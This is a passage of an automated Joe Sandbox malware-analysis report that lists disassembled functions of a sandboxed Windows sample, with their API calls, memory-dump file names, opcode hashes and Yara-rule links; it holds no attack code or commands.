                                          • GetLengthSid.ADVAPI32(?,00000000,0095842F), ref: 009588CA
                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009588D6
                                          • HeapAlloc.KERNEL32(00000000), ref: 009588DD
                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 009588F6
                                          • GetProcessHeap.KERNEL32(00000000,00000000,0095842F), ref: 0095890A
                                          • HeapFree.KERNEL32(00000000), ref: 00958911
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 192b9832a7b636154bd314d159aa8609dc0dae309e0f8851c77521db914476ad
                                          • Instruction ID: b23492a8f02ef5ab7120fc7c506fad84c1826c1ab67b198dbf97e2d4739c6c9a
                                          • Opcode Fuzzy Hash: 192b9832a7b636154bd314d159aa8609dc0dae309e0f8851c77521db914476ad
                                          • Instruction Fuzzy Hash: 0011AF31525209FFDB10DFA5DC29BBFB76CEB44316F104028E846A7210CB32A918DB60
                                          Function 009585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009585E2
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 009585E9
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009585F8
                                          • CloseHandle.KERNEL32(00000004), ref: 00958603
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00958632
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00958646
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: 68f7b7191ca3037a64557d553154ccfdb0de5fc1fc187c1f32897e4a156d3d5b
                                          • Instruction ID: 8f661e91193e70afcce178cd42c5c1107e2fe9f2393c0aab16346a330c2c48ed
                                          • Opcode Fuzzy Hash: 68f7b7191ca3037a64557d553154ccfdb0de5fc1fc187c1f32897e4a156d3d5b
                                          • Instruction Fuzzy Hash: 7911597250520DABDF01CFA5DD49BEF7BA9EF08345F144065FE04A2260C7768E65EB60
                                          Function 0095B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0095B7B5
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0095B7C6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095B7CD
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0095B7D5
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0095B7EC
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0095B7FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 0c582c8444926fd08bce411499434030fea87a7515b40512ef2deace0fe69504
                                          • Instruction ID: 378b227b904a3544c48ff5f1fc8f73f5c2f7596363af57c452ef2d675601402b
                                          • Opcode Fuzzy Hash: 0c582c8444926fd08bce411499434030fea87a7515b40512ef2deace0fe69504
                                          • Instruction Fuzzy Hash: 11017175A04209BBEF109BA69C49B5ABFA8EB48311F004065FE04A7391D6309C10CF90
                                          Function 00920162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00920193
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0092019B
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009201A6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009201B1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 009201B9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 009201C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: 058b07d3d7b87ce49b14ed37f5428079a1b5b5f341101ca4b1032ddb7da192b9
                                          • Instruction ID: f08160643f1a7c7171a5f538feb3c4ba55d59679e7373e8b90803650a68d8a58
                                          • Opcode Fuzzy Hash: 058b07d3d7b87ce49b14ed37f5428079a1b5b5f341101ca4b1032ddb7da192b9
                                          • Instruction Fuzzy Hash: 9E016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5
                                          Function 009653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009653F9
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0096540F
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0096541E
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096542D
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00965437
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096543E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: a07b3b4eeb0c078d8036ef84be59b47a68363d694a8e24eaf74676d01403a9fc
                                          • Instruction ID: 1d46f244e41e1e125234e95d6b2f6bd2d815c969b2aafb7bd1ab83446f3d0ee8
                                          • Opcode Fuzzy Hash: a07b3b4eeb0c078d8036ef84be59b47a68363d694a8e24eaf74676d01403a9fc
                                          • Instruction Fuzzy Hash: 9CF09032258558BBE3205BA2DC0DEEF7B7CEFCAB11F000269FA04D1160EBA01A0197B5
                                          Function 00967230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00967243
                                          • EnterCriticalSection.KERNEL32(?,?,00910EE4,?,?), ref: 00967254
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00910EE4,?,?), ref: 00967261
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00910EE4,?,?), ref: 0096726E
                                            • Part of subcall function 00966C35: CloseHandle.KERNEL32(00000000,?,0096727B,?,00910EE4,?,?), ref: 00966C3F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00967281
                                          • LeaveCriticalSection.KERNEL32(?,?,00910EE4,?,?), ref: 00967288
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: cdb6e6abce3b55accc6c8456c764841c9fc21b97f2607e128e586b367de8e484
                                          • Instruction ID: 1d9464c2e6264ab4e6cb51ac8518f04352262bf4a4a2026b4d9f0e0677b04a40
                                          • Opcode Fuzzy Hash: cdb6e6abce3b55accc6c8456c764841c9fc21b97f2607e128e586b367de8e484
                                          • Instruction Fuzzy Hash: AFF02736058A02EBD7111FA4EC5CADB7739FF44302F101131F213A01B0CB7A1810DB50
                                          Function 00958992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095899D
                                          • UnloadUserProfile.USERENV(?,?), ref: 009589A9
                                          • CloseHandle.KERNEL32(?), ref: 009589B2
                                          • CloseHandle.KERNEL32(?), ref: 009589BA
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 009589C3
                                          • HeapFree.KERNEL32(00000000), ref: 009589CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: c0f12271e5d6b7d637e7df9939d96c0f8471ae37b10dac30eb232e8a463a3056
                                          • Instruction ID: a18d567af3e0d5d008ff95a9d969c1bbcabf6a7a2004bad5ea4ea193594c4a5c
                                          • Opcode Fuzzy Hash: c0f12271e5d6b7d637e7df9939d96c0f8471ae37b10dac30eb232e8a463a3056
                                          • Instruction Fuzzy Hash: 5EE0C236018401FBDA011FE1EC1C90ABB69FB89362B109231F21AC1274CB329420EB50
                                          Function 009785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00978613
                                          • CharUpperBuffW.USER32(?,?), ref: 00978722
                                          • VariantClear.OLEAUT32(?), ref: 0097889A
                                            • Part of subcall function 00967562: VariantInit.OLEAUT32(00000000), ref: 009675A2
                                            • Part of subcall function 00967562: VariantCopy.OLEAUT32(00000000,?), ref: 009675AB
                                            • Part of subcall function 00967562: VariantClear.OLEAUT32(00000000), ref: 009675B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: cd76b5661c0f69e21bb81e40b2de30c78305ef3dfeff37beb9d699403aa6c45e
                                          • Instruction ID: 3a88d453d4b7dea0b0e0254f62bed832eb8dec59274db766fbc117a52ce3acae
                                          • Opcode Fuzzy Hash: cd76b5661c0f69e21bb81e40b2de30c78305ef3dfeff37beb9d699403aa6c45e
                                          • Instruction Fuzzy Hash: 5D916E756083019FC710DF24C484A5BB7E8EFC9714F14896EF99A8B3A2DB31E905CB52
                                          Function 00962A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • _memset.LIBCMT ref: 00962B87
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00962BB6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00962C69
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00962C97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: bbe10071ceb7eef07fcba512fe0ffffa6bafbdcf3308762d71e88c83dbf47002
                                          • Instruction ID: 37f874ae950b51ed24bf0a81fffd004afc94fff2ce2cb212417e9cf9dc196cda
                                          • Opcode Fuzzy Hash: bbe10071ceb7eef07fcba512fe0ffffa6bafbdcf3308762d71e88c83dbf47002
                                          • Instruction Fuzzy Hash: E451EC71608B019EC7249F28D845A6FB7E8EF89310F040A6EF8D4D62D0DB78CC44DB92
                                          Function 0095D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0095D5D4
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0095D60A
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0095D61B
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0095D69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: a78096e4e103b9d60c275ce873da995c7663332193fb0781ec3eba29201dc889
                                          • Instruction ID: 7098a1e8a0d0f8ae3a510702ea542a9ba78a1db2d6864e7962d2c40fc980565e
                                          • Opcode Fuzzy Hash: a78096e4e103b9d60c275ce873da995c7663332193fb0781ec3eba29201dc889
                                          • Instruction Fuzzy Hash: DD41B1B1602204EFDF24DF55C884B9ABBA9EF84315F1581A9EC09DF205D7B0DE49CBA0
                                          Function 00962753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 009627C0
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009627DC
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00962822
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009C5890,00000000), ref: 0096286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 0f7e7d07225cdaed531ae634e6c8fe0e03e7998688df4c51c564845354b814f4
                                          • Instruction ID: 3106284d157ab3c45a5a3a7c43836fb1330b9f21d9e0f074e75a4782eaceef05
                                          • Opcode Fuzzy Hash: 0f7e7d07225cdaed531ae634e6c8fe0e03e7998688df4c51c564845354b814f4
                                          • Instruction Fuzzy Hash: 85418E706087419FD720DF28CC44F6ABBE8EF85324F14492DF9A59B2D1D734A905CB62
                                          Function 0097D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0097D7C5
                                            • Part of subcall function 0090784B: _memmove.LIBCMT ref: 00907899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: e117da0d7d425fffde83202b59b0816aeb56c62f8ff7898b3263b298ff26088d
                                          • Instruction ID: d7e366be6688936cf524d83bf55ef00c2a47b98b5ddca49009b0f2bc40edaabc
                                          • Opcode Fuzzy Hash: e117da0d7d425fffde83202b59b0816aeb56c62f8ff7898b3263b298ff26088d
                                          • Instruction Fuzzy Hash: 2131B271904619AFCF10EF94CC91AEEB7B4FF84320B108629E829976D2DB31AD05CB80
                                          Function 00958E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                            • Part of subcall function 0095AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0095AABC
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00958F14
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00958F27
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00958F57
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: 711a8f32b8723db06e976a86e88d85cfc4ff10bcc33b7b5b977c6ba9d693908b
                                          • Instruction ID: 68a377bd9d1fb597be3af728fe4f38de8d2f32d65f41169a8a6ff59505931385
                                          • Opcode Fuzzy Hash: 711a8f32b8723db06e976a86e88d85cfc4ff10bcc33b7b5b977c6ba9d693908b
                                          • Instruction Fuzzy Hash: 1621D271A04108BEDB14ABA19C85EFFB769DF85320B144629FC25A72E1DA39580A9B60
                                          Function 0097182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097184C
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971872
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009718A2
                                          • InternetCloseHandle.WININET(00000000), ref: 009718E9
                                            • Part of subcall function 00972483: GetLastError.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 00972498
                                            • Part of subcall function 00972483: SetEvent.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 009724AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 349d636d923b8c969f7318f5d4a4b60d0e49be26d5e5f9bd3b6c591b3de9854e
                                          • Instruction ID: 51ace7cbf7046d8bfb0af34dd4ab451dff54c6c77f5e91fff1148204ef028a8d
                                          • Opcode Fuzzy Hash: 349d636d923b8c969f7318f5d4a4b60d0e49be26d5e5f9bd3b6c591b3de9854e
                                          • Instruction Fuzzy Hash: D22180B2514208BFEB119F68DC85FFB77EDEB88B44F10812AF54996240EA249D0567A1
                                          Function 009863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00901D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00901D73
                                            • Part of subcall function 00901D35: GetStockObject.GDI32(00000011), ref: 00901D87
                                            • Part of subcall function 00901D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00901D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00986461
                                          • LoadLibraryW.KERNEL32(?), ref: 00986468
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0098647D
                                          • DestroyWindow.USER32(?), ref: 00986485
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
